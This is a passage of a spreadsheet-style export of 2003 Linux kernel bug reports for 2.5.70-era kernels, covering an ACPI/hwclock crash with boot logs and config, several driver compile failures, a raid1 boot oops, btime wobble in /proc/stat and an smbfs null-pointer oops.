    <t>Distribution: SuSE 8.2 Hardware Environment: Acer Travelmate 800 LCi (= Pentium M + Centrino chipset) Software Environment: gcc 3.3 20030226 (prerelease) Problem Description: Invoking hwclock will crash the machine badly (no logs, oopses whatever). The machine is not responding to the sysrq-key. However, there is an error message during bootup (evevent-0286, see below). Steps to reproduce: The kernel is configured with acpi-support and rtc as a module. First noticed this with 2.5.69-bk18 (maybe 2.5.69-bk17, but that kernel didn't even boot correctly). It is hard to tell if it's really a pure acpi problem, as - booting with acpi=off helps (on 2.5.70-bk1) - rmmod rtc with acpi=on also helps (on 2.5.70-bk1). I get an error message during booting which might or might not be related to the problem: Inspecting /boot/System.map-2.5.70-bk1 Loaded 23497 symbols from /boot/System.map-2.5.70-bk1. Symbols match kernel version 2.5.70. No module symbols loaded - kernel modules not enabled. klogd 1.4.1, log source = ksyslog started. &lt;4&gt;Linux version 2.5.70-bk1 (root@grobi) (gcc version 3.3 20030226 (prerelease) (SuSE Linux)) #3 Tue May 27 19:49:23 CEST 2003 &lt;4&gt;Video mode to be used for restore is 342 &lt;6&gt;BIOS-provided physical RAM map: &lt;4&gt; BIOS-e820: 0000000000000000 - 000000000009f800 (usable) &lt;4&gt; BIOS-e820: 000000000009f800 - 00000000000a0000 (reserved) &lt;4&gt; BIOS-e820: 00000000000e0000 - 0000000000100000 (reserved) &lt;4&gt; BIOS-e820: 0000000000100000 - 000000001ff70000 (usable) &lt;4&gt; BIOS-e820: 000000001ff70000 - 000000001ff7b000 (ACPI data) &lt;4&gt; BIOS-e820: 000000001ff7b000 - 000000001ff80000 (ACPI NVS) &lt;4&gt; BIOS-e820: 000000001ff80000 - 0000000020000000 (reserved) &lt;4&gt; BIOS-e820: 00000000ff800000 - 00000000ffc00000 (reserved) &lt;4&gt; BIOS-e820: 00000000fff00000 - 0000000100000000 (reserved) &lt;5&gt;511MB LOWMEM available. &lt;4&gt;On node 0 totalpages: 130928 &lt;4&gt; DMA zone: 4096 pages, LIFO batch:1 &lt;4&gt; Normal zone: 126832 pages, LIFO batch:16 &lt;4&gt; HighMem zone: 0 pages, LIFO batch:1 &lt;6&gt;ACPI: RSDP (v000 ACER ) @ 0x000f5dc0 &lt;6&gt;ACPI: RSDT (v001 ACER Cardinal 08194.00769) @ 0x1ff74c61 &lt;6&gt;ACPI: FADT (v001 ACER Cardinal 08194.00769) @ 0x1ff7af64 &lt;6&gt;ACPI: BOOT (v001 ACER Cardinal 08194.00769) @ 0x1ff7afd8 &lt;6&gt;ACPI: DSDT (v001 ACER Cardinal 08194.00769) @ 0x00000000 &lt;5&gt;ACPI: BIOS passes blacklist &lt;4&gt;Building zonelist for node : 0 &lt;4&gt;Kernel command line: splash=silent root=/dev/hda5 idebus=66 devfs=nomount vga=0x0342 video=vesafb:mtrr &lt;6&gt;ide_setup: idebus=66 &lt;6&gt;Initializing CPU#0 &lt;4&gt;PID hash table entries: 2048 (order 11: 16384 bytes) &lt;4&gt;Detected 1299.504 MHz processor. &lt;4&gt;Console: colour dummy device 80x25 &lt;4&gt;Calibrating delay loop... 2564.09 BogoMIPS &lt;6&gt;Memory: 514712k/523712k available (2000k kernel code, 8260k reserved, 676k data, 112k init, 0k highmem) &lt;6&gt;Dentry cache hash table entries: 65536 (order: 6, 262144 bytes) &lt;4&gt;Inode-cache hash table entries: 32768 (order: 5, 131072 bytes) &lt;4&gt;Mount-cache hash table entries: 512 (order: 0, 4096 bytes) &lt;6&gt;-&gt; /dev &lt;6&gt;-&gt; /dev/console &lt;6&gt;-&gt; /root &lt;6&gt;CPU: L1 I cache: 32K, L1 D cache: 32K &lt;6&gt;CPU: L2 cache: 1024K &lt;7&gt;CPU: After generic, caps: a7e9f9bf 00000000 00000000 00000040 &lt;6&gt;Intel machine check architecture supported. &lt;6&gt;Intel machine check reporting enabled on CPU#0. &lt;4&gt;CPU: Intel(R) Pentium(R) M processor 1300MHz stepping 05 &lt;6&gt;Enabling fast FPU save and restore... done. &lt;6&gt;Enabling unmasked SIMD FPU exception support... done. &lt;6&gt;Checking 'hlt' instruction... OK. &lt;4&gt;POSIX conformance testing by UNIFIX &lt;4&gt;mtrr: v2.0 (20020519) &lt;4&gt;Initializing RT netlink socket &lt;6&gt;PCI: PCI BIOS revision 2.10 entry at 0xfd732, last bus=2 &lt;6&gt;PCI: Using configuration type 1 &lt;4&gt;BIO: pool of 256 setup, 14Kb (56 bytes/bio) &lt;4&gt;biovec pool[0]: 1 bvecs: 256 entries (12 bytes) &lt;4&gt;biovec pool[1]: 4 bvecs: 256 entries (48 bytes) &lt;4&gt;biovec pool[2]: 16 bvecs: 256 entries (192 bytes) &lt;4&gt;biovec pool[3]: 64 bvecs: 256 entries (768 bytes) &lt;4&gt;biovec pool[4]: 128 bvecs: 256 entries (1536 bytes) &lt;4&gt;biovec pool[5]: 256 bvecs: 256 entries (3072 bytes) &lt;6&gt;ACPI: Subsystem revision 20030522 &lt;4&gt; tbxface-0117 [03] acpi_load_tables : ACPI Tables successfully acquired &lt;4&gt;Parsing all Control Methods:..................................................................................................................................................................................................... &lt;4&gt;Table [DSDT](id F004) - 729 Objects with 51 Devices 197 Methods 15 Regions &lt;4&gt;ACPI Namespace successfully loaded at root c03d593c &lt;4&gt;evxfevnt-0093 [04] acpi_enable : Transition to ACPI mode successful &lt;4&gt;evgpeblk-0743 [06] ev_create_gpe_block : GPE 00 to 31 [_GPE] 4 regs at 0000000000001028 on int 9 &lt;4&gt;evgpeblk-0262 [08] ev_save_method_info : Registered GPE method _L05 as GPE number 0x05 &lt;4&gt;evgpeblk-0262 [08] ev_save_method_info : Registered GPE method _L0B as GPE number 0x0B &lt;4&gt;evgpeblk-0262 [08] ev_save_method_info : Registered GPE method _L03 as GPE number 0x03 &lt;4&gt;evgpeblk-0262 [08] ev_save_method_info : Registered GPE method _L04 as GPE number 0x04 &lt;4&gt;evgpeblk-0262 [08] ev_save_method_info : Registered GPE method _L0C as GPE number 0x0C &lt;4&gt;evgpeblk-0262 [08] ev_save_method_info : Registered GPE method _E18 as GPE number 0x18 &lt;4&gt; evevent-0286: *** Error: No installed handler for fixed event [00000000] &lt;4&gt;irq 9: nobody cared! &lt;4&gt;Call Trace: &lt;4&gt; [handle_IRQ_event+126/247] handle_IRQ_event+0x7e/0xf7 &lt;4&gt; [do_IRQ+323/894] do_IRQ+0x143/0x37e &lt;4&gt; [common_interrupt+24/32] common_interrupt+0x18/0x20 &lt;4&gt; [setup_irq+284/661] setup_irq+0x11c/0x295 &lt;4&gt; [kmalloc+338/387] kmalloc+0x152/0x183 &lt;4&gt; [request_irq+71/190] request_irq+0x47/0xbe &lt;4&gt; [acpi_irq+0/26] acpi_irq+0x0/0x1a &lt;4&gt; [request_irq+128/190] request_irq+0x80/0xbe &lt;4&gt; [acpi_os_install_interrupt_handler+59/91] acpi_os_install_interrupt_handler+0x3b/0x5b &lt;4&gt; [acpi_irq+0/26] acpi_irq+0x0/0x1a &lt;4&gt; [acpi_irq+0/26] acpi_irq+0x0/0x1a &lt;4&gt; [acpi_ev_install_sci_handler+70/93] acpi_ev_install_sci_handler+0x46/0x5d &lt;4&gt; [acpi_ev_sci_xrupt_handler+0/79] acpi_ev_sci_xrupt_handler+0x0/0x4f &lt;4&gt; [acpi_ev_handler_initialize+46/193] acpi_ev_handler_initialize+0x2e/0xc1 &lt;4&gt; [acpi_enable_subsystem+279/322] acpi_enable_subsystem+0x117/0x142 &lt;4&gt; [acpi_bus_init+152/317] acpi_bus_init+0x98/0x13d &lt;4&gt; [acpi_init+142/222] acpi_init+0x8e/0xde &lt;4&gt; [do_initcalls+36/153] do_initcalls+0x24/0x99 &lt;4&gt; [init_workqueues+18/40] init_workqueues+0x12/0x28 &lt;4&gt; [init+159/759] init+0x9f/0x2f7 &lt;4&gt; [init+0/759] init+0x0/0x2f7 &lt;4&gt; [init+0/759] init+0x0/0x2f7 &lt;4&gt; [kernel_thread_helper+5/11] kernel_thread_helper+0x5/0xb &lt;4&gt; &lt;4&gt;handlers: &lt;4&gt;[acpi_irq+0/26] (acpi_irq+0x0/0x1a) &lt;4&gt;Completing Region/Field/Buffer/Package initialization:........................................................................................ &lt;4&gt;Initialized 15/15 Regions 3/3 Fields 41/41 Buffers 29/29 Packages (737 nodes) &lt;4&gt;Executing all Device _STA and_INI methods:.................................................... &lt;4&gt;52 Devices found containing: 52 _STA, 2 _INI methods &lt;6&gt;ACPI: Interpreter enabled &lt;6&gt;ACPI: Using PIC for interrupt routing &lt;6&gt;ACPI: PCI Root Bridge [PCI0] (00:00) &lt;4&gt;PCI: Probing PCI hardware (bus 00) &lt;6&gt;PCI: Ignoring BAR0-3 of IDE controller 00:1f.1 &lt;4&gt;Transparent bridge - Intel Corp. 82801BAM/CAM PCI Bri &lt;7&gt;ACPI: PCI Interrupt Routing Table [\_SB_.PCI0._PRT] &lt;7&gt;ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.AGP_._PRT] &lt;4&gt;ACPI: PCI Interrupt Link [LNKA] (IRQs *10) &lt;4&gt;ACPI: PCI Interrupt Link [LNKB] (IRQs *10) &lt;4&gt;ACPI: PCI Interrupt Link [LNKC] (IRQs *10) &lt;4&gt;ACPI: PCI Interrupt Link [LNKD] (IRQs *5) &lt;4&gt;ACPI: PCI Interrupt Link [LNKE] (IRQs 3 4 5 7 9 11 12, enabled at IRQ 10) &lt;4&gt;ACPI: PCI Interrupt Link [LNKF] (IRQs 3 4 5 7 9 11 12, disabled) &lt;4&gt;ACPI: PCI Interrupt Link [LNKG] (IRQs 10, disabled) &lt;4&gt;ACPI: PCI Interrupt Link [LNKH] (IRQs *10) &lt;6&gt;ACPI: Embedded Controller [EC0] (gpe 29) &lt;7&gt;ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.HUB_._PRT] &lt;6&gt;ACPI: Power Resource [PFN0] (off) &lt;6&gt;ACPI: Power Resource [PFN1] (off) &lt;4&gt;block request queues: &lt;4&gt; 4/128 requests per read queue &lt;4&gt; 4/128 requests per write queue &lt;4&gt; enter congestion at 15 &lt;4&gt; exit congestion at 17 &lt;4&gt;ACPI: PCI Interrupt Link [LNKF] enabled at IRQ 11 &lt;4&gt;ACPI: PCI Interrupt Link [LNKG] enabled at IRQ 10 &lt;6&gt;PCI: Using ACPI for IRQ routing &lt;6&gt;PCI: if you experience problems, try using option 'pci=noacpi' or even 'acpi=off' &lt;6&gt;SBF: Simple Boot Flag extension found and enabled. &lt;6&gt;SBF: Setting boot flags 0x1 &lt;4&gt;Enabling SEP on CPU 0 &lt;4&gt;Total HugeTLB memory allocated, 0 # # # # # # # # # # # # # # # # # # # # # # lspci -vv (excerpt) 00:00.0 Host bridge: Intel Corp.: Unknown device 3340 (rev 03) Subsystem: Acer Incorporated [ALI]: Unknown device 001f Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort+ &lt;MAbort+ &gt;SERR- &lt;PERR- Latency: 0 Region 0: Memory at e0000000 (32-bit, prefetchable) [size=256M] Capabilities: [e4] #09 [f104] Capabilities: [a0] AGP version 2.0 Status: RQ=32 Iso- ArqSz=0 Cal=0 SBA+ ITACoh- GART64- HTrans- 64bit- FW+ AGP3- Rate=x1,x2,x4 Command: RQ=1 ArqSz=0 Cal=0 SBA- AGP- GART64- 64bit- FW- Rate=x1 00:01.0 PCI bridge: Intel Corp.: Unknown device 3341 (rev 03) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap- 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 96 Bus: primary=00, secondary=01, subordinate=01, sec-latency=64 I/O behind bridge: 00003000-00003fff Memory behind bridge: d0100000-d01fffff Prefetchable memory behind bridge: d8000000-dfffffff BridgeCtl: Parity- SERR- NoISA+ VGA+ MAbort- &gt;Reset- FastB2B- 00:1e.0 PCI bridge: Intel Corp. 82801BAM/CAM PCI Bridge (rev 83) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort+ &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR+ Latency: 0 Bus: primary=00, secondary=02, subordinate=02, sec-latency=64 I/O behind bridge: 00004000-00004fff Memory behind bridge: d0200000-d05fffff BridgeCtl: Parity- SERR- NoISA+ VGA- MAbort- &gt;Reset- FastB2B- 00:1f.0 ISA bridge: Intel Corp.: Unknown device 24cc (rev 03) Control: I/O+ Mem+ BusMaster+ SpecCycle+ MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 # # # # # # # # # # # # # # # # # # # # # # The probably relevant kernel options: CONFIG_X86=y CONFIG_MMU=y CONFIG_UID16=y CONFIG_GENERIC_ISA_DMA=y CONFIG_EXPERIMENTAL=y CONFIG_SWAP=y CONFIG_SYSVIPC=y CONFIG_BSD_PROCESS_ACCT=y CONFIG_SYSCTL=y CONFIG_LOG_BUF_SHIFT=16 CONFIG_FUTEX=y CONFIG_EPOLL=y CONFIG_MODULES=y CONFIG_MODULE_UNLOAD=y CONFIG_MODULE_FORCE_UNLOAD=y CONFIG_OBSOLETE_MODPARM=y CONFIG_MODVERSIONS=y CONFIG_KMOD=y CONFIG_X86_PC=y CONFIG_MPENTIUM4=y CONFIG_X86_CMPXCHG=y CONFIG_X86_XADD=y CONFIG_X86_L1_CACHE_SHIFT=7 CONFIG_RWSEM_XCHGADD_ALGORITHM=y CONFIG_X86_WP_WORKS_OK=y CONFIG_X86_INVLPG=y CONFIG_X86_BSWAP=y CONFIG_X86_POPAD_OK=y CONFIG_X86_GOOD_APIC=y CONFIG_X86_INTEL_USERCOPY=y CONFIG_X86_USE_PPRO_CHECKSUM=y CONFIG_HUGETLB_PAGE=y CONFIG_PREEMPT=y CONFIG_X86_TSC=y CONFIG_X86_MCE=y CONFIG_NOHIGHMEM=y CONFIG_MTRR=y CONFIG_HAVE_DEC_LOCK=y CONFIG_PM=y CONFIG_ACPI=y CONFIG_ACPI_BOOT=y CONFIG_ACPI_AC=y CONFIG_ACPI_BATTERY=y CONFIG_ACPI_BUTTON=y CONFIG_ACPI_FAN=y CONFIG_ACPI_PROCESSOR=y CONFIG_ACPI_THERMAL=y CONFIG_ACPI_DEBUG=y CONFIG_ACPI_BUS=y CONFIG_ACPI_INTERPRETER=y CONFIG_ACPI_EC=y CONFIG_ACPI_POWER=y CONFIG_ACPI_PCI=y CONFIG_ACPI_SYSTEM=y CONFIG_CPU_FREQ=y CONFIG_CPU_FREQ_PROC_INTF=y CONFIG_CPU_FREQ_GOV_USERSPACE=y CONFIG_CPU_FREQ_24_API=y CONFIG_CPU_FREQ_TABLE=y CONFIG_X86_ACPI_CPUFREQ=y CONFIG_X86_ACPI_CPUFREQ_PROC_INTF=y CONFIG_X86_SPEEDSTEP=m CONFIG_X86_P4_CLOCKMOD=m CONFIG_PCI=y CONFIG_PCI_GOANY=y CONFIG_PCI_BIOS=y CONFIG_PCI_DIRECT=y CONFIG_PCI_LEGACY_PROC=y CONFIG_PCI_NAMES=y CONFIG_ISA=y CONFIG_HOTPLUG=y CONFIG_HW_RANDOM=m CONFIG_RTC=m</t>
  </si>
  <si>
    <t>hisax needs unresolved symbol kstat__per_cpu</t>
  </si>
  <si>
    <t>2.5.70-bk1</t>
  </si>
  <si>
    <t>2003-05-28 03:44 UTC</t>
  </si>
  <si>
    <t>Anders Storsveen</t>
  </si>
  <si>
    <t>2003-11-26 16:19 UTC</t>
  </si>
  <si>
    <t>aic7xxx compile fails</t>
  </si>
  <si>
    <t>2003-05-28 11:14 UTC</t>
  </si>
  <si>
    <t>Distribution: slackware Hardware Environment: k7T master Software Environment: gcc 3.3 , glibc 2.3.1 Problem Description: compile of aic7xxx driver fails Steps to reproduce: make -s menuconfig make -s install part of the compile log drivers/scsi/aic7xxx/aic7xxx_osm.c: In function `ahc_linux_map_seg': drivers/scsi/aic7xxx/aic7xxx_osm.c:767: warning: integer constant is too large for "long" type make[3]: *** [drivers/scsi/aic7xxx/aic7xxx_osm.o] Error 1 make[2]: *** [drivers/scsi/aic7xxx] Error 2 make[1]: *** [drivers/scsi] Error 2 make: *** [drivers] Error 2</t>
  </si>
  <si>
    <t>this kernel would not boot for me</t>
  </si>
  <si>
    <t>2003-05-28 13:38 UTC</t>
  </si>
  <si>
    <t>2004-03-03 21:36 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian/Sid Hardware Environment: Intel dual-Xeon 2.4 Ghz processors w/ hyperthreading Software Environment: gcc 2.95.4 Problem Description: I was able to boot all prior 2.5.x kernels investigated. However this one locked up just shortly after booting with the following message: ACPI-0286 - No installed handler for fixed event. Unable to handle kernel null pointer dereference at virtual address 00000008 Kernel Panic: Fatal exception in interrupt Steps to reproduce:</t>
  </si>
  <si>
    <t>raid1 boot oops</t>
  </si>
  <si>
    <t>2.5.70-bk5 to 2.5.70-bk13</t>
  </si>
  <si>
    <t>2003-06-01 04:38 UTC</t>
  </si>
  <si>
    <t>2003-06-11 13:53 UTC</t>
  </si>
  <si>
    <t>Neil Brown</t>
  </si>
  <si>
    <t>Distribution: Red Raw Hide Hardware Environment: GA-7VAX mobo http://www.giga-byte.com/products/7vax.htm (Via KT400 + Via VT8235 + Realtek RTL8100BL), F10 bios Silicon Image 680 ATA controler http://216.168.201.72/Site/E04/ProductContext.asp?SN=11810&amp;Supplier_SN=1312&amp;Site_Product_Classify_SN=10&amp;Keyword=&amp;test= Software Environment: software Raid 1 Problem Description: oops on boot</t>
  </si>
  <si>
    <t>btime in /proc/stat wobbles (even over 30 seconds)</t>
  </si>
  <si>
    <t>2.5.70 but also in 2.2.20</t>
  </si>
  <si>
    <t>2003-06-02 06:19 UTC</t>
  </si>
  <si>
    <t>Hans Lambermont</t>
  </si>
  <si>
    <t>2003-06-18 17:46 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian and Red Hat Hardware Environment: i386 Software Environment: /proc Problem Description: btime in /proc/stat changes over time. We even see it wobble over 30 seconds. See also http://www.google.nl/search?q=cache:ISSy3HrMcvQJ:bugzilla.redhat.com/bugzilla/long_list.cgi%3Fbuglist%3D75107+btime+/proc/stat&amp;hl=nl&amp;ie=UTF-8 Steps to reproduce: Comparing /proc/stat's btime every minute shows the differences. We see this behaviour on all of our 1500 Linux machines.</t>
  </si>
  <si>
    <t>smbfs segfault when mounting mountpoint that is in use(?)</t>
  </si>
  <si>
    <t>Samba/SMB</t>
  </si>
  <si>
    <t>2.5.70-mm1</t>
  </si>
  <si>
    <t>2003-06-02 13:32 UTC</t>
  </si>
  <si>
    <t>Chris Davies</t>
  </si>
  <si>
    <t>2003-06-22 07:03 UTC</t>
  </si>
  <si>
    <t>Distribution:Debian Hardware Environment:Toshiba Satellite Pro 4600, mounting smbfs system from Debian 2.4.20-xfs-rmap15f machine Software Environment:xmms, smbfs, xfs filesystem Problem Description: Kernel segfault when I mount an smbfs mount while the mountpoint may have a file open Steps to reproduce: Package: smbfs Version: 2.999+3.0.alpha24-3 Severity: normal I can duplicate this about 60% of the time -- however, once it hangs, anything dealing with the mounted filesystem will cause the process to hang. Kill -9 mount.smbfs has no result. (it was mentioned in an old bug report for smbfs dealing with 2.2/potato) ls /music and df both hang when accessing the samba partition. Much harder to duplicate is disconnecting the network connection to the other machine after it has been mounted, but before any files have been requested. I can get it to do that perhaps 1% of the time. Both errors started after I upgraded from 2.4.20 to 2.5.70-mm1. According to the userland utils, no recent updates have been made. How it happens: I have a laptop with wifi, and of course the samba filesystem doesn't mount during bootup (probably a config issue on my part). I start xmms without having the samba filesystem mounted and it starts playing, however every file in the playlist cannot be found. While it is going through that, I mount the filesystem. When the system is mounted, there is a 60/40 chance that it will segfault. In 2.4 it seemed to work fine, however, I do keep somewhat current with apt-get upgrades, so I don't know if there was a recent samba upgrade that happened since I upgraded to 2.5. (NOTE, smbfs guys claim it is a kernel bug, not a userspace bug) Error in dmesg: Unable to handle kernel NULL pointer dereference at virtual address 00000000 printing eip: 00000000 *pde = 00000000 Oops: 0000 [#1] CPU: 0 EIP: 0060:[&lt;00000000&gt;] Tainted: PF VLI EFLAGS: 00010296 EIP is at 0x0 eax: d2c7cf00 ebx: d5aac760 ecx: 00000000 edx: d5aac760 esi: d8983e58 edi: c29752c0 ebp: c29752c0 esp: d8983e24 ds: 007b es: 007b ss: 0068 Process xmms (pid: 15041, threadinfo=d8982000 task=c45dd270) Stack: c01dae00 d5aac760 c29752c0 d8983e58 ffffffdc c29752c0 d8983e58 c01dc413 c29752c0 d8983e58 00000003 00000000 00000000 00000000 00000000 00010000 000003e8 000003e8 00000000 00000000 00000000 00000000 00000000 00000000 Call Trace: [&lt;c01dae00&gt;] smb_proc_getattr+0x40/0x60 [&lt;c01dc413&gt;] smb_lookup+0x43/0x150 [&lt;c016082a&gt;] real_lookup+0xca/0xf0 [&lt;c0160ace&gt;] do_lookup+0x9e/0xb0 [&lt;c0160c09&gt;] link_path_walk+0x129/0x8e0 [&lt;c0161cd6&gt;] open_namei+0x76/0x3f0 [&lt;c0120973&gt;] exit_notify+0x243/0x720 [&lt;c01515be&gt;] filp_open+0x3e/0x70 [&lt;c0151a8b&gt;] sys_open+0x5b/0x90 [&lt;c01092cb&gt;] syscall_call+0x7/0xb Code: Bad EIP value. -- System Information: Debian Release: testing/unstable Architecture: i386 Kernel: Linux mcdlp 2.5.70-mm1 #1 Wed May 28 23:13:10 EDT 2003 i686 Locale: LANG=C, LC_CTYPE=C Versions of packages smbfs depends on: ii e2fsprogs [li 1.33+1.34-WIP-2003.05.21-1 The EXT2 file system utilities and ii libc6 2.3.1-17 GNU C Library: Shared libraries an pn libcomerr2 Not found. ii libkrb53 1.2.7-4 MIT Kerberos runtime libraries ii netbase 4.09 Basic TCP/IP networking system ii samba-common 2.999+3.0.alpha24-3 Samba common files used by both th -- no debconf information</t>
  </si>
  <si>
    <t>aic7xxx.c fails to compile (errno)</t>
  </si>
  <si>
    <t>2003-06-02 14:37 UTC</t>
  </si>
  <si>
    <t>Diego Calleja</t>
  </si>
  <si>
    <t>Distribution: redhat/rawhide Hardware Environment: Alpha Software Environment: Raehide Problem Description: file fails to compile: cc1: warnings being treated as errors drivers/scsi/aic7xxx/aic7xxx_osm.c:147: warning: `errno' defined but not used make[3]: *** [drivers/scsi/aic7xxx/aic7xxx_osm.o] Error 1 make[2]: *** [drivers/scsi/aic7xxx] Error 2 make[1]: *** [drivers/scsi] Error 2 make: *** [drivers] Error 2 Steps to reproduce: select aic7xxx drive and compile Solution: Comment out the line.</t>
  </si>
  <si>
    <t>in ieee1394 file iso.c fails to compile</t>
  </si>
  <si>
    <t>2003-06-02 15:05 UTC</t>
  </si>
  <si>
    <t>2003-07-03 05:11 UTC</t>
  </si>
  <si>
    <t>Distribution:redhat Hardware Environment:Alpha PC164LX Software Environment:Rawhide Problem Description: file fails to compile (as module embedded untested) drivers/ieee1394/iso.c: In function `hpsb_iso_xmit_sync': drivers/ieee1394/iso.c:355: arithmetic on pointer to an incomplete type drivers/ieee1394/iso.c:355: warning: implicit declaration of function `set_current_state' drivers/ieee1394/iso.c:355: `TASK_INTERRUPTIBLE' undeclared (first use in this function) drivers/ieee1394/iso.c:355: (Each undeclared identifier is reported only once drivers/ieee1394/iso.c:355: for each function it appears in.) drivers/ieee1394/iso.c:355: warning: implicit declaration of function `signal_pending' drivers/ieee1394/iso.c:355: arithmetic on pointer to an incomplete type drivers/ieee1394/iso.c:355: warning: implicit declaration of function `schedule' drivers/ieee1394/iso.c:355: arithmetic on pointer to an incomplete type drivers/ieee1394/iso.c:355: dereferencing pointer to incomplete type drivers/ieee1394/iso.c:355: `TASK_RUNNING' undeclared (first use in this function) drivers/ieee1394/iso.c: In function `hpsb_iso_wake': drivers/ieee1394/iso.c:431: `TASK_INTERRUPTIBLE' undeclared (first use in this function) make[2]: *** [drivers/ieee1394/iso.o] Error 1 make[1]: *** [drivers/ieee1394] Error 2 make: *** [drivers] Error 2 Steps to reproduce: Select ieee1394 as an module and activate all items lower in the configuration tree as an module Solution Add the line #include &lt;linux/sched.h&gt; between the following lines (line number 11) #include &lt;linux/slab.h&gt; #include "iso.h"</t>
  </si>
  <si>
    <t>Kernel locks up when heavily using pthread keys (NPTL)</t>
  </si>
  <si>
    <t>2003-06-02 17:33 UTC</t>
  </si>
  <si>
    <t>Carlo Wood</t>
  </si>
  <si>
    <t>2004-12-04 06:17 UTC</t>
  </si>
  <si>
    <t>Distribution: RedHat 9 Hardware Environment: athlon 900 with 386392 kB RAM Software Environment: RedHat 9 + updates with custom configured 2.5.69 kernel. Problem Description: Kernel freezes (no Oops) while running user program. Steps to reproduce: I am reluctant to try to reproduce this (I already lost a file during file system repair - and it takes 30 minutes to do that file system check). However - it seems clear to me what caused the lockup: I was testing a program existing of 15 threads, each of which created 100 pthread_keys and who wrote to std::cerr (it is a C++ program) inside their key destruction routine, using a pthread_mutex around that write. Theoretically it should be reproducable by getting the source of 'libcwd' from CVS (http://libcwd.sourceforge.net) of a date/time of around 3 June 0:30 am GMT (the NEWS file should mention version 0.99.31 - then you got the correct time), run './bootstrap' and configure with 'CC=gcc-cvs-3.4 CXX=g++-cvs-3.4 ./configure --enable-maintainer-mode --enable-debugt --enable-debugm --enable-debug --disable-nonthreading --disable-debug-output', then 'make' and 'make threads_threads_shared' inside testsuite/. Run then threads_threads_shared a few times... (it doesn't ALWAYS happen, that I know).</t>
  </si>
  <si>
    <t>usbaudio does not compile</t>
  </si>
  <si>
    <t>2.5.70-bk8</t>
  </si>
  <si>
    <t>2003-06-03 09:40 UTC</t>
  </si>
  <si>
    <t>Distribution: SuSE 8.2 Hardware Environment: Acer Travelmate 800 LCi Software Environment: gcc 3.3 Problem Description: usbaudio does not compile on 2.5.70-bk8 (I've skipped a few snapshots, so it might have been introduced at &gt; 2.5.70-bk5) It used to compile before. Error-log: In file included from sound/usb/usbaudio.c:35: include/linux/usb.h: In function `usb_make_path': include/linux/usb.h:327: warning: comparison between signed and unsigned sound/usb/usbaudio.c: In function `parse_audio_format_i_type': sound/usb/usbaudio.c:1947: error: `iface_no' undeclared (first use in this function) sound/usb/usbaudio.c:1947: error: (Each undeclared identifier is reported only once sound/usb/usbaudio.c:1947: error: for each function it appears in.) sound/usb/usbaudio.c:1947: error: `altno' undeclared (first use in this function) sound/usb/usbaudio.c: In function `parse_audio_endpoints': sound/usb/usbaudio.c:2172: warning: comparison between signed and unsigned sound/usb/usbaudio.c: In function `snd_usb_audio_create': sound/usb/usbaudio.c:2582: warning: comparison between signed and unsigned make[2]: *** [sound/usb/usbaudio.o] Error 1 make[1]: *** [sound/usb] Error 2 make: *** [sound] Error 2 Steps to reproduce: Pentium M + Centrino / ACPI / usb CONFIG_SOUND=m CONFIG_SND=m CONFIG_SND_SEQUENCER=m CONFIG_SND_SEQ_DUMMY=m CONFIG_SND_OSSEMUL=y CONFIG_SND_MIXER_OSS=m CONFIG_SND_PCM_OSS=m CONFIG_SND_SEQUENCER_OSS=y CONFIG_SND_RTCTIMER=m CONFIG_SND_VERBOSE_PRINTK=y CONFIG_SND_DEBUG=y CONFIG_SND_DEBUG_DETECT=y CONFIG_SND_DUMMY=m CONFIG_SND_VIRMIDI=m CONFIG_SND_MTPAV=m CONFIG_SND_SERIAL_U16550=m CONFIG_SND_MPU401=m CONFIG_SND_ALI5451=m CONFIG_SND_EMU10K1=m CONFIG_SND_YMFPCI=m CONFIG_SND_ENS1370=m CONFIG_SND_ENS1371=m CONFIG_SND_INTEL8X0=m CONFIG_SND_SONICVIBES=m CONFIG_SND_VIA82XX=m CONFIG_SND_USB_AUDIO=m CONFIG_SOUND_PRIME=m CONFIG_SOUND_BT878=m CONFIG_SOUND_ICH=m CONFIG_SOUND_VIA82CXXX=m CONFIG_SOUND_OSS=m CONFIG_SOUND_TRACEINIT=y CONFIG_SOUND_DMAP=y CONFIG_USB=m CONFIG_USB_DEVICEFS=y CONFIG_USB_BANDWIDTH=y CONFIG_USB_EHCI_HCD=m CONFIG_USB_OHCI_HCD=m CONFIG_USB_UHCI_HCD=m CONFIG_USB_AUDIO=m CONFIG_USB_MIDI=m CONFIG_USB_ACM=m CONFIG_USB_PRINTER=m CONFIG_USB_STORAGE=m CONFIG_USB_STORAGE_DATAFAB=y CONFIG_USB_STORAGE_FREECOM=y CONFIG_USB_STORAGE_ISD200=y CONFIG_USB_STORAGE_DPCM=y CONFIG_USB_STORAGE_SDDR09=y CONFIG_USB_STORAGE_SDDR55=y CONFIG_USB_STORAGE_JUMPSHOT=y CONFIG_USB_HID=m CONFIG_USB_HIDINPUT=y CONFIG_USB_HIDDEV=y CONFIG_USB_AIPTEK=m CONFIG_USB_WACOM=m CONFIG_USB_KBTAB=m</t>
  </si>
  <si>
    <t>compile failure with smp+preempt+debug_eventlog</t>
  </si>
  <si>
    <t>linux-2.5.70-mm4</t>
  </si>
  <si>
    <t>2003-06-04 06:54 UTC</t>
  </si>
  <si>
    <t>2003-06-05 13:03 UTC</t>
  </si>
  <si>
